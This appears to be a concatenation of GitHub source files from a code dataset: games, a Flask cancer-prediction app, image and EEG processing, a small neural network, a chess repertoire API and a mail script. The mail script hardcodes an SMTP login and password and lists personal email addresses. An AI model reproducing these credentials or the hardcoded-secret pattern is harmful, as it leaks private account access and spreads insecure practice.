choices.replace(player1_choice,'')\nprint(f\"Player1 chooses {player1_choice}\")\nprint(f\"Player2 gets {player2_choice}\")\n\nvalue = None\nbox_number = None\n\nobject1 = 2\nobject2 = 3\nobject3 = 4\nobject4 = 5\nobject5 = 6\nobject6 = 7\nobject7 = 8\nobject8 = 9\nobject9 = 10\n\ndef object_call (value , box_number):\n if box_number == 1:\n global object1\n object1 = value\n\n if box_number == 2:\n global object2\n object2 = value\n\n if box_number == 3:\n global object3\n object3 = value\n\n if box_number == 4:\n global object4\n object4 = value\n\n if box_number == 5:\n global object5\n object5 = value\n\n if box_number == 6:\n global object6\n object6 = value\n\n if box_number == 7:\n global object7\n object7 = value\n\n if box_number == 8:\n global object8\n object8 = value\n\n if box_number == 9:\n global object9\n object9 = value\n\n \n\ndef victory_check():\n \n if object1 == object2 == object3 or object7 == object8 == object9 or object4 == object5 == object6 or object1 == object4 == object7 or object2 == object5 == object8 or object3 == object6 == object9 or object1 == object5 == object9 or object3 == object5 == object7 :\n return 0\n else:\n return 1\n\ncount = 0\nwhile True :\n box_number = int(input(\"Player 1 enter \"))\n if player1_choice == 'X':\n object = Cross(box_number)\n value = object.value\n \n elif player1_choice == '0':\n object = Knott(box_number)\n value = object.value\n \n object_call(value,box_number)\n\n count = count+1 \n if count==9:\n print(\"no one wins\")\n break\n \n status_1 = victory_check()\n \n if status_1 == 1:\n pass\n\n elif status_1 == 0 :\n print(\"player1 wins\")\n break\n \n box_number = int(input(\"Player 2 enter \"))\n if player2_choice == 'X':\n object = Cross(box_number)\n value = object.value\n \n elif player2_choice == '0':\n object = Knott(box_number)\n value = object.value\n \n object_call(value,box_number)\n\n count = count+1\n if count==9:\n print(\"no one wins\")\n break\n \n status_2 = victory_check()\n \n if status_2 == 1:\n pass\n\n elif status_2 == 0:\n print(\"player2 wins\")\n break\n\n \n\n\n\n\n\n","repo_name":"Arunabh17/tic_tac_toe","sub_path":"tic tac toe/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23756943411","text":"import pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn import metrics\r\nfrom flask import Flask,request,render_template\r\nimport pickle\r\n\r\napp=Flask(__name__)\r\nq=\"\"\r\n@app.route(\"/\")\r\ndef loadPage():\r\n return render_template('home.html',query='')\r\n\r\n@app.route('/',methods=['POST'])\r\ndef cancerPredict():\r\n\r\n #5 input queries from the user post method allows us\r\n input1=request.form['query1']\r\n input2=request.form['query2']\r\n input3=request.form['query3']\r\n input4=request.form['query4']\r\n input5=request.form['query5']\r\n data=[[input1,input2,input3,input4,input5]]\r\n new_df=pd.DataFrame(data,columns=['texture_mean','perimeter_mean','smoothness_mean','compactness_mean','symmetry_mean'])\r\n\r\n model = pickle.load(open(\"model.sav\", \"rb\"))\r\n y_pred=model.predict(new_df)\r\n probability=model.predict_proba(new_df)[:,1]\r\n if y_pred==1:\r\n o1=\"The patient is diagnosed with Breast Cancer\"\r\n o2=\"Confidence {}\".format(probability*100)\r\n else:\r\n o1=\"The patient is healthy and not diagnosed with Breast Cancer\"\r\n o2=\"Confidence {} \".format(probability*100)\r\n return render_template('home.html',output1=o1,output2=o2,query1=request.form['query1'],query2=request.form['query2'],query3=request.form['query3'],query4=request.form['query4'],query5=request.form['query5'])\r\napp.run()","repo_name":"keithferns98/E2E_DEV","sub_path":"BreastCancerpredflask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72418076649","text":"# PREPROCESSING SCRIPT\n# Images are stored as multi-channel images. During image acquisition one additional image\n# is stored with the LED off. This image has to be removed.\n\n\nimport re\nfrom pathlib import Path\n\nimport numpy as np\nfrom skimage.io import imread, imsave\nfrom tqdm import tqdm\n\n\ndef NDTiffStack_to_tiff(\n\n path_parent = Path(r'/media/tom/Transcend/autofish_test_input/'),\n n_z = 33, # number of z plances\n n_pos = 3, # number of field of images\n # Number of channels\n n_c_default = 1,\n n_c_dict = {'r0_1': 2, 'r1_1': 2},\n # Diverse string replacements\n string_replacements_path = [('images_multi-stack', 'images'),\n ('_1', '')],\n\n string_replacements_file = [('_NDTiffStack.*', ''),\n (\"_bgd*\", \"\"),\n ('Pos', 'pos'),\n ],\n folder_save = \"/media/tom/Transcend/autofish_test/\"\n ):\n \"\"\"\n Args:\n path_parent: (Str) Path to main folder containing the round folder of NDTiffStack\n n_z: (int) number of z stack\n n_pos: (int) number of field of images\n n_c_default: (int) default number of channel\n n_c_dict: (dict) add round that have a different number of channel like additional DAPI staining e\n ex :{'r0_1': 2, 'r1_1': 2}\n string_replacements_path: (list of tuple) list of tuple of string to replace in the folder name\n string_replacements_file: (list of tuple) list of tuple of string to replace in the file name\n folder_save: (str) path to the folder to save the tiff\n Returns:\n list of exception if any\n \"\"\"\n n_c_keys = list(n_c_dict.keys())\n path_parent = Path(path_parent)\n folder_save = Path(folder_save)\n folder_save.mkdir(parents=True, exist_ok=True)\n path_list = []\n for child in path_parent.glob('**/'):\n # for child in path_parent.rglob('*'):\n path_list.append(child)\n path_list.remove(path_parent)\n print(path_list)\n # %% Loop over all subfolders\n list_exceptions = []\n for path_images in tqdm(path_list):\n try:\n print(f'>>>> SCANNING FOLDER FOR IMAGES: {path_images}')\n # Get number of channels\n n_c_key = [n_c_key for n_c_key in n_c_keys if (n_c_key in str(path_images))]\n if len(n_c_key) == 0:\n n_c = n_c_default\n print(f'Will use default number of channels: {n_c}')\n elif len(n_c_key) == 1:\n n_c = n_c_dict[n_c_key[0]]\n print(f'Will use pre-defined channel number {n_c} for round {n_c_key[0]}')\n else:\n raise Exception(f'ERROR: multiple matches for n_c found, verify strings: {n_c_key}')\n # >>> Scan folder to get all files\n file_list = []\n for f_image in path_images.glob('*.tif'):\n # >> Only NDTIFF\n if ('NDTiffStack' in str(f_image.stem)):\n file_list.append(str(f_image))\n else:\n print(' Image name suggests that this is not a NDTiff image, will skip this one.')\n continue\n file_list = sorted(file_list)\n n_files = len(file_list)\n print(f' Found images: {file_list}')\n # >> Create path to save images\n round_name = path_images.name\n for old, new in string_replacements_path:\n round_name = re.sub(old, new, round_name, count=0, flags=0)\n path_save = folder_save / round_name\n print(f' Images will be saved in folder: {path_save}')\n path_save.mkdir(parents=True, exist_ok=True)\n\n # >>>>> Loop over images and split channels\n\n i_total = 0 # Total number of processed slices\n i_file = 0 # Index of currently loaded file\n\n # load first image\n print(f' Loading image: {file_list[i_file]}')\n img = imread(file_list[i_file])\n print(f' Image shape: {img.shape} {path_images.name}')\n if img.shape[-1] == 3:\n img = img.transpose(2, 0, 1) # Transpose to (z, x, y)\n n_slices = img.shape[0]\n\n for i_pos in tqdm(range(0, n_pos)):\n for i_c in range(0, n_c):\n\n # Index of current image\n i_img = (i_pos) * n_c + i_c\n\n # Start and end index of current image\n i_start = (i_img * n_z)\n i_end = (i_start + n_z - 1)\n\n # Correct for all slices loaded from previous images\n i_start = i_start - i_total\n i_end = i_end - i_total\n\n print(f' start-end: {i_start}:{i_end}')\n\n # >> Decide if next image should be loaded\n if i_end <= n_slices:\n img_save = img[i_start:i_end, :, :]\n # Next image needs to be loaded\n elif (i_end > n_slices):\n\n # Extract remaining image\n img_tmp_1 = img[i_start:n_slices, :, :]\n\n # Load next image\n i_file = i_file + 1\n i_total = i_total + n_slices\n\n if i_file >= n_files:\n raise Exception(\n ' We are having an issue here, should open another file to continue, but there are not files left.')\n print(f' Loading image: {file_list[i_file]}')\n img = imread(file_list[i_file])\n print(f' Image shape: {img.shape}')\n if img.shape[-1] == 3:\n img = img.transpose(2, 0, 1)\n n_slices = img.shape[0]\n\n # Load remainder of image\n img_tmp_2 = img[0:i_end - i_total, :, :]\n\n # Add images\n img_save = np.concatenate((img_tmp_1, img_tmp_2), axis=0)\n\n # File name\n name_save = str(f_image.stem)\n for old, new in string_replacements_file:\n name_save = re.sub(old, new, name_save, count=0, flags=0)\n name_save = name_save + f'_pos{i_pos}' + f'_ch{i_c}' + '.tif'\n\n # Save image\n f_save = path_save / name_save\n print(f' Image will be saved as {str(f_save)}')\n print(f' SAVED Image shape: {img_save.shape}')\n imsave(str(f_save), img_save, check_contrast=False)\n except Exception as e:\n print(f'ERROR: {e}')\n list_exceptions.append((e, path_images.name))\n return list_exceptions\n","repo_name":"tdefa/autofish-img-analysis","sub_path":"autofish_analysis/split_ndtiff_stack.py","file_name":"split_ndtiff_stack.py","file_ext":"py","file_size_in_byte":6863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42046162056","text":"import random\r\nimport numpy as np\r\n\r\ndados = {\r\n 'or': [[0.0, 0.0, 0.0],\r\n [0.0, 1.0, 1.0],\r\n [1.0, 0.0, 1.0],\r\n [1.0, 1.0, 1.0]],\r\n \r\n 'and': [[0.0, 0.0, 0.0],\r\n [0.0, 1.0, 0.0],\r\n [1.0, 0.0, 0.0],\r\n [1.0, 1.0, 1.0]],\r\n \r\n 'xor': [[0.0, 0.0, 0.0],\r\n [0.0, 1.0, 1.0],\r\n [1.0, 0.0, 1.0],\r\n [1.0, 1.0, 0.0]],\r\n\r\n 'nand' : [[0.0, 0.0, 1.0],\r\n [0.0, 1.0, 1.0],\r\n [1.0, 0.0, 1.0],\r\n [1.0, 1.0, 0.0]]\r\n}\r\n\r\nneuronios = { \r\n 'A': {\r\n 'erro': float(0.00),\r\n 'saida': float(0.00),\r\n 'ativacao': float(0.00)\r\n }, \r\n \r\n 'B': {\r\n 'erro': float(0.00),\r\n 'saida': float(0.00),\r\n 'ativacao': float(0.00)\r\n },\r\n \r\n 'C': {\r\n 'erro': float(0.00),\r\n 'saida': float(0.00),\r\n 'ativacao': float(0.00)\r\n }\r\n}\r\n\r\nbias = [1.0, 1.0, 1.0] #a, b, c\r\n\r\n\r\npesos_A = list([random.uniform(-1.2,1.2), random.uniform(-1.2, 1.2)])\r\npesos_B = list([random.uniform(-1.2,1.2), random.uniform(-1.2, 1.2)])\r\npesos_C = list([random.uniform(-1.2,1.2), random.uniform(-1.2, 1.2)]) # 0=A, 1=B\r\n\r\ndef sigmoid(x):\r\n return 1 / (1 + np.exp(-x))\r\n\r\ndef treinamento(entrada, max_iter, tx_aprend):\r\n sair = 0\r\n erroGlobal = 0\r\n it = 0\r\n j = 0\r\n global neuronios\r\n global bias\r\n global pesos_A\r\n global pesos_B\r\n global pesos_C\r\n\r\n while it <= max_iter and sair == 0:\r\n quadErro = 0\r\n\r\n for i in range(len(entrada)):\r\n \r\n # cálculo da ativação e saída da primeira camada\r\n neuronios['A']['ativacao'] = pesos_A[0]*entrada[i][0] + pesos_A[1]*entrada[i][1] + bias[0]\r\n neuronios['B']['ativacao'] = pesos_B[0]*entrada[i][0] + pesos_B[1]*entrada[i][1] + bias[1]\r\n\r\n neuronios['A']['saida'] = sigmoid(neuronios['A']['ativacao'])\r\n neuronios['B']['saida'] = sigmoid(neuronios['B']['ativacao'])\r\n\r\n\r\n # cálculo da ativação e saída da última camada\r\n neuronios['C']['ativacao'] = pesos_C[0]*neuronios['A']['saida'] + pesos_C[1]*neuronios['B']['saida'] + bias[2]\r\n neuronios['C']['saida'] = sigmoid(neuronios['C']['ativacao'])\r\n\r\n\r\n # cálculo do erro na saída da rede\r\n erroGlobal = entrada[i][2] - neuronios['C']['saida']\r\n\r\n #quadErro = quadErro + (erroGlobal**2)\r\n\r\n # cálculo do erro local da última camada\r\n neuronios['C']['erro'] = erroGlobal * neuronios['C']['saida'] * (1- neuronios['C']['saida'])\r\n\r\n # cálculo do erro local da primeira camada\r\n neuronios['A']['erro'] = neuronios['A']['saida']*(1- neuronios['A']['saida']) * pesos_C[0]*neuronios['C']['erro']\r\n neuronios['B']['erro'] = neuronios['B']['saida']*(1- neuronios['B']['saida']) * pesos_C[1]*neuronios['C']['erro']\r\n\r\n \r\n # Ajuste dos pesos nas unidades intermediárias (Neurônio A)\r\n bias[0] = bias[0] + (tx_aprend * neuronios['A']['erro'] * bias[0])\r\n pesos_A[0] = pesos_A[0] + (tx_aprend * neuronios['A']['erro'] * entrada[i][0])\r\n pesos_A[1] = pesos_A[1] + (tx_aprend * neuronios['A']['erro'] * entrada[i][1])\r\n\r\n # Ajuste dos pesos nas unidades intermediárias (Neurônio B)\r\n bias[1] = bias[1] + (tx_aprend * neuronios['B']['erro'] * bias[1])\r\n pesos_B[0] = pesos_B[0] + (tx_aprend * neuronios['B']['erro'] * entrada[i][0])\r\n pesos_B[1] = pesos_B[1] + (tx_aprend * neuronios['B']['erro'] * entrada[i][1])\r\n\r\n # ajuste dos pesos e bias da última camada \r\n bias[2] = bias[2] + (tx_aprend * neuronios['C']['erro'] * bias[2])\r\n pesos_C[0] = pesos_C[0] + (tx_aprend * neuronios['C']['erro'] * neuronios['A']['saida'])\r\n pesos_C[1] = pesos_C[1] + (tx_aprend * neuronios['C']['erro'] * neuronios['B']['saida'])\r\n\r\n j+=1 \r\n if j >4:\r\n j = 0 \r\n quadErro = quadErro + (erroGlobal * erroGlobal)\r\n if quadErro <= 0.001:\r\n sair = 1\r\n print(\"treinamento ok!\")\r\n else:\r\n sair = 0\r\n quadErro = 0\r\n else:\r\n quadErro = quadErro + (erroGlobal * erroGlobal)\r\n \r\n print(\"quad erro - \", quadErro)\r\n it = it+1\r\n\r\n\r\ndef use():\r\n op = 'S'\r\n\r\n while op == 'S':\r\n entrada_user1 = int(input(\"Insira um valor para entrada (0 ou 1)- \"))\r\n entrada_user2 = int(input(\"Insira outro valor para entrada (0 ou 1)- \"))\r\n\r\n neuronios['A']['ativacao'] = bias[0] + pesos_A[0] * entrada_user1 + pesos_A[1] * entrada_user2\r\n neuronios['B']['ativacao'] = bias[1] + pesos_B[0] * entrada_user1 + pesos_B[1] * entrada_user2\r\n\r\n neuronios['A']['saida'] = sigmoid(neuronios['A']['ativacao'])\r\n neuronios['B']['saida'] = sigmoid(neuronios['B']['ativacao'])\r\n\r\n neuronios['C']['ativacao'] = bias[2] + pesos_C[0] * neuronios['A']['saida'] + pesos_C[1] * neuronios['B']['saida']\r\n neuronios['C']['saida'] = sigmoid(neuronios['C']['ativacao'])\r\n\r\n saida_use = neuronios['C']['saida']\r\n\r\n if saida_use < 0.5:\r\n saida_use = 0\r\n else:\r\n saida_use = 1\r\n\r\n print(\"Entrada 1 - \", entrada_user1)\r\n print(\"Entrada 2 - \", entrada_user2)\r\n print(\"Saída - \", saida_use)\r\n \r\n op = str(input('Deseja Continuar, S ou N - ')).upper() \r\n\r\n \r\n\r\nchave = str(input(\"Insira uma tabela para treino: XOR, OR, AND, NAND - \")).lower()\r\nn_iter = int(input(\"Insira o número máxmo de iterações - \"))\r\ntx_aprend = float(input(\"Insira a taxa de aprendizado para a rede - \"))\r\nent = dados[chave]\r\n\r\ntreinamento(ent, n_iter, tx_aprend)\r\nuse()\r\n","repo_name":"YuriBandeira28/Inteligencia-Artificial","sub_path":"MLP.py","file_name":"MLP.py","file_ext":"py","file_size_in_byte":6455,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12619668217","text":"import logging\nfrom dff.script import TRANSITIONS, RESPONSE, MISC, Message\nfrom dff.pipeline import Pipeline\nimport dff.script.conditions as cnd\n\nfrom .utils import condition as loc_cnd\nfrom .utils.common import pre_services\nfrom dff.utils.testing import run_interactive_mode\n\nlogger = logging.getLogger(__name__)\n\n# Below, `script` is the dialog script.\n# A dialog script is a flow dictionary that can contain multiple flows .\n# script are needed in order to divide a dialog into sub-dialogs and process them separately.\n# For example, the separation can be tied to the topic of the dialog.\n# In our example, there is one flow called greeting_flow.\n\n# Inside each flow, we can describe a sub-dialog.\n# Here we can also use keyword `LOCAL`, which we have considered in other examples.\n\n# Flow describes a sub-dialog using linked nodes, each node has the keywords `RESPONSE` and `TRANSITIONS`.\n\n# `RESPONSE` - contains the response that the dialog agent will return when transitioning to this node.\n# `TRANSITIONS` - describes transitions from the current node to other nodes.\n# `TRANSITIONS` are described in pairs:\n# - the node to which the agent will perform the transition\n# - the condition under which to make the transition\nscript = {\n \"greeting_flow\": {\n \"start_node\": { # This is an initial node, it doesn't need an `RESPONSE`\n RESPONSE: Message(text=\"\"),\n # TRANSITIONS: {\"node1\": cnd.exact_match(Message(text=\"Hi\"))}, # If \"Hi\" == request of user then we make the transition\n TRANSITIONS: {\n \"node1\": cnd.all([loc_cnd.is_sf(\"Open.Give.Opinion\"), loc_cnd.is_midas(\"pos_answer\")])\n },\n MISC: {\"speech_functions\": [\"start_node\"]},\n },\n \"node1\": {\n RESPONSE: Message(text=\"Hi, how are you?\"), # When the agent goes to node1, we return \"Hi, how are you?\"\n TRANSITIONS: {\"node2\": cnd.exact_match(Message(text=\"i'm fine, how are you?\"))},\n },\n \"node2\": {\n RESPONSE: Message(text=\"Good. What do you want to talk about?\"),\n TRANSITIONS: {\"node3\": cnd.exact_match(Message(text=\"Let's talk about music.\"))},\n MISC: {\"speech_functions\": [\"Open.Attend\"]},\n },\n \"node3\": {\n RESPONSE: Message(text=\"Sorry, I can not talk about music now.\"),\n TRANSITIONS: {\"node4\": cnd.exact_match(Message(text=\"Ok, goodbye.\"))},\n },\n \"node4\": {\n RESPONSE: Message(text=\"bye\"),\n TRANSITIONS: {\"node1\": cnd.exact_match(Message(text=\"Hi\"))},\n MISC: {\"speech_functions\": [\"Open.Attend\"]},\n },\n \"fallback_node\": { # We get to this node if an error occurred while the agent was running\n RESPONSE: Message(text=\"Ooops\"),\n TRANSITIONS: {\"node1\": cnd.exact_match(Message(text=\"Hi\"))},\n MISC: {\"speech_functions\": [\"fallback_node\"]},\n },\n },\n}\n\n# A pipeline is an object that processes user input replicas and returns responses\n# To create the pipeline, you need to pass the script of the dialogue `script`\n# And pass the initial node `start_label`\n# and the node to which the pipeline will go in case of an error `fallback_label`\n# If `fallback_label` is not set, then its value becomes equal to `start_label` by default\npipeline = Pipeline.from_script(\n script=script,\n start_label=(\"greeting_flow\", \"start_node\"),\n fallback_label=(\"greeting_flow\", \"fallback_node\"),\n pre_services=pre_services\n)\n\nif __name__ == \"__main__\":\n run_interactive_mode(pipeline)\n","repo_name":"ruthenian8/dialog_flow_sdk","sub_path":"examples/basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15928007868","text":"import mne\nfrom os import path\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n'''\nFiltered raw fif data files are contain data from 1 block (PV0, WM0, PV1, WM1)\nThey have the following format ...\n %4d_%s%d_%s:%sHz-raw.fif % (participant_number, condition, block_number,\n l_freq, h_freq)\n'''\n\n# define the code directory\ncode_dir = path.dirname(__file__)\n\n# define the data directory (this file is not found in the repository, there\n# should be a local copy on your machine that points to the data)\nfid = open(code_dir + '/data_dir.path')\ndata_dir = fid.read().rstrip('\\n')\nfid.close()\n\n\nclass raw_filt:\n\n \"\"\"Class to handle filtered raw eeg data\n\n Parameters\n ----------\n participant_id : int\n The id number for this participant\n condition : str\n Passive view (PV) or Working memory (WM)\n block_number : int\n 0 or 1\n l_freq : int\n The high pass\n h_freq : int\n The low pass\n \"\"\"\n def __init__(self, participant_id, condition, block_number,\n l_freq, h_freq):\n\n self.participant_id = participant_id\n self.condition = condition\n self.block_number = block_number\n self.raw_fname = data_dir + '/FILTFIF/%d_%s%d_%s:%sHz-raw.fif' % \\\n (participant_id, condition, block_number,\n l_freq, h_freq)\n\n def _read_fif(self):\n # check to see if data has already been read\n if hasattr(self, 'raw'):\n return self.raw\n else:\n # read the raw fif\n raw = mne.io.read_raw_fif(self.raw_fname, preload=True, proj=False,\n add_eeg_ref=False)\n # store is attribute\n self.raw = raw\n return raw\n\n def plot_event_channel(self, show=False, save=True,\n figsize=(20, 10)):\n # read the raw fif\n raw = mne.io.read_raw_fif(self.raw_fname, preload=False, proj=False,\n add_eeg_ref=False)\n # find the events\n x1, t1 = raw[-1]\n x1 = x1[0]\n # plot the events\n fig = plt.figure(figsize=figsize)\n ax = fig.add_subplot(111)\n ax.plot(t1, x1, 'b')\n ax.set_xticks(np.arange(0, t1.max(), 100))\n ax.set_ylim((0, 6e4))\n ax.set_xlabel('Time (seconds)')\n xlim = ax.get_xlim()\n ax.plot(xlim, [4096, 4096], 'r-')\n ax.plot(xlim, [8192, 8192], 'r-')\n ax.plot(xlim, [16384, 16384], 'r-')\n ax.plot(xlim, [32768, 32768], 'r-')\n\n if save:\n # save the figure\n png_fname = self.raw_fname.replace('.fif', '.png')\n fig.savefig(png_fname)\n if show:\n # display the figure\n plt.show()\n else:\n # close the figure\n plt.close(fig)\n\n def epoch_data(self):\n # read the raw data\n raw = self._read_fif()\n # get the events\n eve = mne.find_events(raw, mask=255)\n # epoch the data\n epo = mne.Epochs(raw, eve, [16384, 32768], -0.1, 0.5,\n preload=True, proj=False, add_eeg_ref=False)\n # generate the epoch filename\n epo_fname = data_dir + '/EPODATA/%d_%s%d-epo.fif' % \\\n (self.participant_id, self.condition,\n self.block_number)\n # save the epoch data\n epo.save(epo_fname)\n # store the epoch data filename\n self.epo_fname = epo_fname\n\nif __name__ == \"__main__\":\n # make sure that the path exists\n this_eeg = raw_filt(1038, 'PV', 0, 1, 30)\n assert path.exists(this_eeg.raw_fname)\n","repo_name":"snn88/EmoWorM_Analysis","sub_path":"raw_filt.py","file_name":"raw_filt.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"906837984","text":"import smtplib\nfrom email.message import EmailMessage\n\ndef send_mail(qty,stri):\n if(stri==\"received\"):\n msg = EmailMessage()\n my_msg = \"Dear Customer, This is a confirmation that your order of quantity \" + str(qty) + \" has been successfully delivered. Looking forward to collaborate with you again in future.\"\n msg.set_content(my_msg)\n msg['Subject'] = 'Order delivered Successfully'\n elif(stri==\"ordered\"):\n msg = EmailMessage()\n my_msg = \"Dear Customer, This is a confirmation that your order of quantity \" + str(qty) + \" has been successfully placed. Looking forward to collaborate with you again in future.\"\n msg.set_content(my_msg)\n msg['Subject'] = 'Order placed Successfully'\n\n msg['From'] = \"pran19cs@cmrit.ac.in\"\n msg['To'] = \"nm.prashanth.64@gmail.com,dishasaligrama1@gmail.com\"\n # Send the message via our own SMTP server.\n server = smtplib.SMTP_SSL('smtp.gmail.com', 465)\n server.login(\"pran19cs@cmrit.ac.in\", \"qwerty@123\")\n server.send_message(msg)\n server.quit()\n\n \n\n","repo_name":"PrashanthNM/Inventory-project-updated","sub_path":"src/inventoryproject/main/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39209051229","text":"import os\nfrom os.path import expanduser\n\nhDirectory = home = expanduser(\"~\")\n\nos.chdir(hDirectory)\nfor f in os.listdir('.'):\n if not f.startswith('.'):\n print(f)\ndirLoc = input('choose a directory: ')\nos.chdir(dirLoc)\n\nwhile True:\n mainName = input('Please Enter the folder name(enter \\'n\\' to exit): ')\n if mainName == 'n':\n break\n os.mkdir(mainName)\n os.chdir(mainName)\n while True:\n subName = input('Please enter the name for subdirectory(enter \\'n\\' to exit): ')\n if subName == 'n':\n os.chdir('..')\n break\n os.mkdir(subName)\n\n","repo_name":"Mustafa-CodeHub/pythonCmd","sub_path":"createFolder/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71269359209","text":"import chess\nfrom flask import Blueprint, jsonify, request\n\nfrom opening_generator.api.api_position import (\n get_board_by_fen,\n get_position_by_board,\n get_color,\n)\nfrom opening_generator.exceptions import InvalidRequestException\nfrom opening_generator.models import Position, User\nfrom opening_generator.services.position_service import position_service\nfrom opening_generator.services.repertoire_service import repertoire_service\nfrom opening_generator.services.user_service import user_service\n\nrepertoire_bp = Blueprint(\"repertoire\", __name__, url_prefix=\"/api/repertoire\")\n\n\ndef get_request_arguments(args):\n move: str = args.get(\"move\")\n color: bool = get_color(args=args)\n board: chess.Board = get_board_by_fen(args)\n position: Position = get_position_by_board(board)\n\n return dict(move=move, color=color, position=position, depth=board.fullmove_number)\n\n\n@repertoire_bp.route(\"\", methods=[\"GET\"])\ndef get_user_repertoire():\n user: User = user_service.get_user()\n args = get_request_arguments(request.args)\n\n moves = repertoire_service.get_repertoire_moves(\n args[\"position\"], user, args[\"color\"], args[\"depth\"]\n )\n return (\n jsonify(message=f\"Repertoire retrieved correctly.\", data=moves, success=True),\n 200,\n )\n\n\n@repertoire_bp.route(\"/info\", methods=[\"GET\"])\ndef get_user_repertoire_info():\n user: User = user_service.get_user()\n\n info = repertoire_service.get_user_repertoire_info(user=user)\n\n return (\n jsonify(\n message=f\"Repertoire info retrieved correctly.\", data=info, success=True\n ),\n 200,\n )\n\n\n@repertoire_bp.route(\"\", methods=[\"POST\"])\ndef create_user_repertoire():\n body = request.json\n\n if not body:\n raise InvalidRequestException(description=\"Missing request body\")\n\n color = body.get(\"color\")\n if not color or color.upper() not in (\"WHITE\", \"BLACK\"):\n raise InvalidRequestException(description=\"Invalid color provided\")\n\n user: User = user_service.get_user()\n initial_position = position_service.retrieve_initial_position()\n repertoire_service.create_user_repertoire(\n position=initial_position, user=user, color=color.upper() == \"WHITE\"\n )\n return jsonify(message=f\"Repertoire created correctly.\", data={}, success=True), 201\n\n\n@repertoire_bp.route(\"\", methods=[\"PUT\"])\ndef edit_user_repertoire():\n user: User = user_service.get_user()\n args = get_request_arguments(request.args)\n\n moves = repertoire_service.update_user_repertoire(\n args[\"position\"], user, args[\"color\"], args[\"move\"]\n )\n if len(moves) == 0:\n return (\n jsonify(\n message=f\"Repertoire could not be updated. Try with another move.\",\n data={},\n success=False,\n ),\n 400,\n )\n moves = repertoire_service.get_repertoire_moves(\n args[\"position\"], user, args[\"color\"], args[\"depth\"]\n )\n return (\n jsonify(\n message=f\"Repertoire updated correctly after {args['position'].fen}.\",\n data=moves,\n success=True,\n ),\n 200,\n )\n\n\n@repertoire_bp.route(\"\", methods=[\"DELETE\"])\ndef delete_user_repertoire():\n user: User = user_service.get_user()\n body = request.json\n color = body.get(\"color\")\n if not color or color.upper() not in (\"WHITE\", \"BLACK\"):\n raise InvalidRequestException(description=\"Invalid color provided\")\n\n repertoire_service.delete_user_repertoire(user, color.upper() == \"WHITE\")\n return (\n jsonify(\n message=f\"{color} repertoire deleted correctly.\",\n data={},\n success=True,\n ),\n 200,\n )\n\n\n@repertoire_bp.route(\"/rival\", methods=[\"PUT\"])\ndef add_rival_move():\n user: User = user_service.get_user()\n args = get_request_arguments(request.args)\n\n if not args[\"move\"]:\n raise InvalidRequestException(description=\"Please provide a rival move to add\")\n\n moves = repertoire_service.add_rival_move_to_repertoire(\n args[\"position\"], user, args[\"color\"], args[\"move\"]\n )\n\n return (\n jsonify(\n message=f\"Repertoire updated correctly after {args['position'].fen}.\",\n data=len(moves),\n success=True,\n ),\n 201,\n )\n\n\n@repertoire_bp.route(\"/rival\", methods=[\"DELETE\"])\ndef remove_rival_move():\n user: User = user_service.get_user()\n args = get_request_arguments(request.args)\n\n if not args[\"move\"]:\n raise InvalidRequestException(\n description=\"Please provide a rival move to remove\"\n )\n\n moves = repertoire_service.remove_rival_move_from_repertoire(\n args[\"position\"], user, args[\"color\"], args[\"move\"]\n )\n\n return (\n jsonify(\n message=f\"Move {args['move']} deleted correctly from user repertoire.\",\n data=len(moves),\n success=True,\n ),\n 200,\n )\n\n\n@repertoire_bp.route(\"\", methods=[\"PATCH\"])\ndef add_variant_to_repertoire():\n user: User = user_service.get_user()\n args = get_request_arguments(request.args)\n repertoire_service.add_variant_to_repertoire(args[\"position\"], user, args[\"color\"])\n moves = repertoire_service.get_repertoire_moves(\n args[\"position\"], user, args[\"color\"], args[\"depth\"]\n )\n return (\n jsonify(\n message=f\"Variant added correctly after {args['position'].fen}.\",\n data=moves,\n success=True,\n ),\n 200,\n )\n","repo_name":"emanuelbrea/chess-opening-generator","sub_path":"opening_generator/api/api_repertoire.py","file_name":"api_repertoire.py","file_ext":"py","file_size_in_byte":5506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21458244362","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'store'\n\nurlpatterns = [\n path('', views.home, name='home'),\n # path('store/all_product', views.all_products, name='all_products'),\n path('store/', views.search_products, name='search_products'),\n path('store/category//', views.category_products, name='category_products'),\n path('detail//', views.product_detail, name='product_detail'),\n path('update_item/', views.update_item, name='update_item'),\n path('cart/', views.cart, name='cart'),\n path('place_order/', views.place_order, name='place_order'),\n\n]\n","repo_name":"ngocquivo/django-ecom","sub_path":"store/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72181986728","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nif __name__ == \"__main__\":\r\n s = input().rstrip()\r\n alphabet = [0]*26\r\n for i in s:\r\n alphabet[ord(i)-ord('a')] += 1\r\n \r\n print(' '.join(list(map(str,alphabet))))\r\n","repo_name":"yerim10044001/ProblemSolving","sub_path":"백준/Bronze/10808. 알파벳 개수/알파벳 개수.py","file_name":"알파벳 